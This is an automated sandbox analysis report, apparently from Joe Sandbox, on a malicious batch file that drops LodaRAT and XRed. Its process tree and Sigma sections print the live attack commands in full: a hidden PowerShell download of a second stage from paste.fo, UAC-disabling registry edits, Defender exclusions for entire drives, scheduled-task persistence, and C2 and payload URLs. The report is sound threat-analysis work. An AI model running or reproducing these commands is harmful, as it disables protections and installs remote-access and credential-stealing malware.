Edit tour

Windows Analysis Report
Supplier.bat

Overview

General Information

Sample name:	Supplier.bat
Analysis ID:	1582345
MD5:	b84568e632497dd5dc2f4ac9f08b783c
SHA1:	a0a8e9493a356a2c495130da52c5b49c3d82685a
SHA256:	b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
Tags:	batknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LodaRAT

Yara detected Powershell download and execute

Yara detected XRed

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Disables UAC (registry)

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Downloads suspicious files via Chrome

Drops PE files to the document folder of the user

Drops password protected ZIP file

Excessive usage of taskkill to terminate processes

Found API chain indicative of sandbox detection

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: PowerShell DownloadFile

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Uses cmd line tools excessively to alter registry or file data

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains executable resources (Code or Archives)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: File Download From Browser Process Via Inline URL

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara detected ProcessChecker

Classification

Process Tree

System is w10x64

cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Supplier.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7320 cmdline: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6112 cmdline: powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\Supplier.bat'))" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 5956 cmdline: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6648 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 5828 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 8060 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 7196 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 7048 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 1016 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 7708 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 8648 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 8780 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 8816 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 8892 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 8972 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

powershell.exe (PID: 9052 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8820 cmdline: PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4252 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8936 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 9020 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 4812 cmdline: PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath" MD5: 04029E121A0CFA5991749937DD22A1D9)

chrome.exe (PID: 1256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 8228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1952,i,12353421626427265679,11746865726713041446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

timeout.exe (PID: 4092 cmdline: timeout /t 15 MD5: 100065E21CFBBDE57CBA2838921F84D6)

7z.exe (PID: 4236 cmdline: "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOCX.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963 MD5: 9A1DD1D96481D61934DCC2D568971D06)

timeout.exe (PID: 9016 cmdline: timeout /t 15 MD5: 100065E21CFBBDE57CBA2838921F84D6)

DOCX.exe (PID: 9212 cmdline: "C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe" MD5: A0177C0A9F2254179B112EECF3C58CC6)

._cache_DOCX.exe (PID: 6108 cmdline: "C:\Users\user\Desktop\._cache_DOCX.exe" MD5: 14AE5A17618D08F48A350E9496C2C959)

cmd.exe (PID: 8808 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8900 cmdline: schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)

wscript.exe (PID: 2220 cmdline: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs MD5: FF00E0480075B095948000BDC66E81F0)

Synaptics.exe (PID: 656 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 4BC81D74086B89C85F1D208F781675F3)

WerFault.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 656 -s 2628 MD5: C31336C1EFC2CCB44B4326EA793040F2)

taskkill.exe (PID: 6608 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 9136 cmdline: taskkill /F /IM firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 9196 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 9148 cmdline: taskkill /F /IM iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 3492 cmdline: taskkill /F /IM opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 6104 cmdline: taskkill /F /IM safari.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 1272 cmdline: taskkill /F /IM brave.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 1556 cmdline: taskkill /F /IM vivaldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8928 cmdline: taskkill /F /IM epic.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 9040 cmdline: taskkill /F /IM yandex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8448 cmdline: taskkill /F /IM tor.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8632 cmdline: taskkill /F /IM CMD.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

svchost.exe (PID: 7512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

EXCEL.EXE (PID: 4252 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

XVZBZS.exe (PID: 8584 cmdline: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe MD5: 14AE5A17618D08F48A350E9496C2C959)

XVZBZS.exe (PID: 7492 cmdline: "C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe" MD5: 14AE5A17618D08F48A350E9496C2C959)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loda, LodaRAT	Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.	No Attribution	https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html https://blog.talosintelligence.com/attributing-yorotrooper/ https://blog.talosintelligence.com/get-a-loda-this/	https://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Supplier.bat	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\TGWEKK.vbs	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
C:\Users\user\Documents\~$cache1	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Documents\~$cache1	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\RCX1FC6.tmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\RCX1FC6.tmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\Downloads\DOCX.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\Users\user\Downloads\DOCX.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_XRed	Yara detected XRed	Joe Security
C:\ProgramData\Synaptics\Synaptics.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 4 entries

Memory Dumps

Source	Rule	Description	Author
0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000037.00000002.2539046765.0000000003020000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000032.00000003.1789798838.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XRed	Yara detected XRed	Joe Security
00000037.00000002.2537729882.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
00000037.00000002.2537729882.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Process Memory Space: powershell.exe PID: 7320	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: DOCX.exe PID: 9212	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: ._cache_DOCX.exe PID: 6108	JoeSecurity_LodaRAT	Yara detected LodaRAT	Joe Security
Process Memory Space: ._cache_DOCX.exe PID: 6108	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Synaptics.exe PID: 656	JoeSecurity_XRed	Yara detected XRed	Joe Security
Process Memory Space: wscript.exe PID: 2220	JoeSecurity_ProcessChecker	Yara detected ProcessChecker	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
42.0.DOCX.exe.400000.0.unpack	JoeSecurity_XRed	Yara detected XRed	Joe Security
42.0.DOCX.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi64_7320.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi64_6112.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_DOCX.exe, Initiated: true, ProcessId: 6108, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 50001

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8136, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5956, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 9052, ProcessName: powershell.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7320, TargetFilename: C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, SourceProcessId: 4252, StartAddress: 69C0DB99, TargetImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, TargetProcessId: 4252

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_DOCX.exe" , ParentImage: C:\Users\user\Desktop\._cache_DOCX.exe, ParentProcessId: 6108, ParentProcessName: ._cache_DOCX.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, ProcessId: 2220, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_DOCX.exe" , ParentImage: C:\Users\user\Desktop\._cache_DOCX.exe, ParentProcessId: 6108, ParentProcessName: ._cache_DOCX.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, ProcessId: 2220, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_DOCX.exe" , ParentImage: C:\Users\user\Desktop\._cache_DOCX.exe, ParentProcessId: 6108, ParentProcessName: ._cache_DOCX.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, ProcessId: 2220, ProcessName: wscript.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8136, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_DOCX.exe, ProcessId: 6108, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TGWEKK

Sigma detected: File Download From Browser Process Via Inline URL

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip, CommandLine|base64offset|contains: -j~b,, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8136, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip, ProcessId: 1256, ProcessName: chrome.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7320, TargetFilename: C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat

